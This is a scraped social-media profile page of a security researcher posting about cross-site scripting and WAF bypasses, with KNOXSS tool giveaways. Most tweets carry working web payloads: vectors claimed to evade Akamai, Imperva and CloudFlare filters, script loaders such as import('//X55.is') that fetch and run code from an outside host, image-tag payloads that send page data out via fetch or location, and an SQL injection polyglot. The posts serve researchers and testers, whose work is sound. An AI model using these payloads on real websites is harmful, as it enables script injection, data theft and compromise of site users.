BRuteLogic Profile Banner
Brute Logic Profile
Brute Logic

@BRuteLogic

Followers
63K
Following
8K
Media
786
Statuses
13K

#CyberSecurity | #XSS | #WAF #bypass | #hack2learn | @RodoAssis | @KN0X55 | https://t.co/GyZaXU7FX9

Brazil 🇧🇷
Joined October 2009
Don't wanna be here? Send us removal request.
@BRuteLogic
Brute Logic
10 months
One #XSS Payload to Rule Them All. #Bypass Akamai, Imperva and CloudFlare #WAF. <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>. #hack2learn @KN0X55
Tweet media one
21
166
737
@BRuteLogic
Brute Logic
4 days
RT @KN0X55: 🚨 KNOXSS GIVEAWAY July 2025. ✅ Follow us.✅ Like and share this. 🎁 Prize: KNOXSS Pro for 1 Month . 🏆 Results: July 7th (3 winner….
0
120
0
@BRuteLogic
Brute Logic
5 days
RT @BRuteLogic: This might trick some #XSS filters out there, including CloudFlare's. <Svg OnLoad="alert//>%0A(1)".
0
28
0
@BRuteLogic
Brute Logic
27 days
Just another #XSS construct that some of you might find interesting and hopefully useful someday.
1
2
29
@BRuteLogic
Brute Logic
1 month
RT @KN0X55: *** KNOXSS GIVEAWAY June 2025 ***. Directions:. 1. Like.2. Share.3. Be a follower. Prize: KNOXSS Pro for 1 Month. Results: June….
0
153
0
@BRuteLogic
Brute Logic
1 month
RT @PaulosYibelo: Wild browser hack from @J0R1AN - a clean, convincing doubleclickjacking PoC that doesn’t rely on clicking specific spots.….
0
4
0
@BRuteLogic
Brute Logic
1 month
RT @BRuteLogic: Our blog was shutted down in the beginning of this year. But here's the Internet Archive version o….
0
14
0
@BRuteLogic
Brute Logic
2 months
Sometimes it doesn't take much to bypass a #WAF in a given #XSS context. For some of them, you will find that this very simple trick does the job. JavaScript%09:alert(1). Maybe you need to tweak the alert(1) a little bit but that's it.
0
6
45
@BRuteLogic
Brute Logic
2 months
The danger of #XSS when SOP can't help you. By @0dayWizard .
1
4
40
@BRuteLogic
Brute Logic
2 months
Mistake here, correct is:. 3. appendChild(createElement`script`).src='//X55.is'.
0
0
3
@BRuteLogic
Brute Logic
2 months
RT @BRuteLogic: Best Alternatives to "alert(1)" #XSS Payload. 1. import('//X55.is'). 2. $.getScript('//X55.is').htt….
0
53
0
@BRuteLogic
Brute Logic
2 months
$.getScript() requires jQuery library already loaded into the DOM.
0
1
9
@BRuteLogic
Brute Logic
2 months
Best Alternatives to "alert(1)" #XSS Payload. 1. import('//X55.is'). 2. $.getScript('//X55.is'). 3. appendChild(createElement'script').src='//X55.is'. Tip: use src attribute to store '//X55.is'. #hack2learn.
8
53
179
@BRuteLogic
Brute Logic
2 months
Our blog was shutted down in the beginning of this year. But here's the Internet Archive version of it, in case you are looking for:.
4
14
52
@BRuteLogic
Brute Logic
2 months
RT @KN0X55: KNOXSS v4.1.1 is out! 😎. Now with OPEN REDIRECT detection and proof!. Also with bug fixes and speed improvements. Available no….
0
6
0
@BRuteLogic
Brute Logic
2 months
This might trick some #XSS filters out there, including CloudFlare's. <Svg OnLoad="alert//>%0A(1)".
0
28
166
@BRuteLogic
Brute Logic
2 months
RT @KN0X55: Try import('//X55.is') instead of alert(1)
Tweet media one
0
102
0
@BRuteLogic
Brute Logic
3 months
RT @KN0X55: Here's our future test case for postMessage #XSS . There are 2 cases, one regular and another with fil….
0
2
0
@BRuteLogic
Brute Logic
3 months
RT @RodoAssis: SQLi Polyglot*. &1/*'/*"/**/||1#\. or. and-1/*'/*"/**/||1--+\. It performs injection on single and double quotes scenarios a….
0
44
0
@BRuteLogic
Brute Logic
3 months
RT @BRuteLogic: Now w/ our you can also. => Exfiltrate DATA. <Img Src=//X55.is/d4t4/ OnError=fetch(src+DATA)>.<Img….
0
23
0
@BRuteLogic
Brute Logic
3 months
Now w/ our you can also. => Exfiltrate DATA. <Img Src=//X55.is/d4t4/ OnError=fetch(src+DATA)>.<Img Src=//X55.is/d4t4/ OnError=location=src+DATA>. (REFERER data).<Img Src=//X55.is OnLoad=location=src>. => Redirect (w/ any subdomain).
@BRuteLogic
Brute Logic
3 years
Use of Our Domain in #XSS. 1. Replacing alert(1):.'-import('//X55.is')-'.<Svg OnLoad=import('//X55.is')>. 2. As href or src attributes:.<Base Href=//X55.is>.<Script Src=//X55.is>. 3. Jumping to # for custom JS:.
0
23
103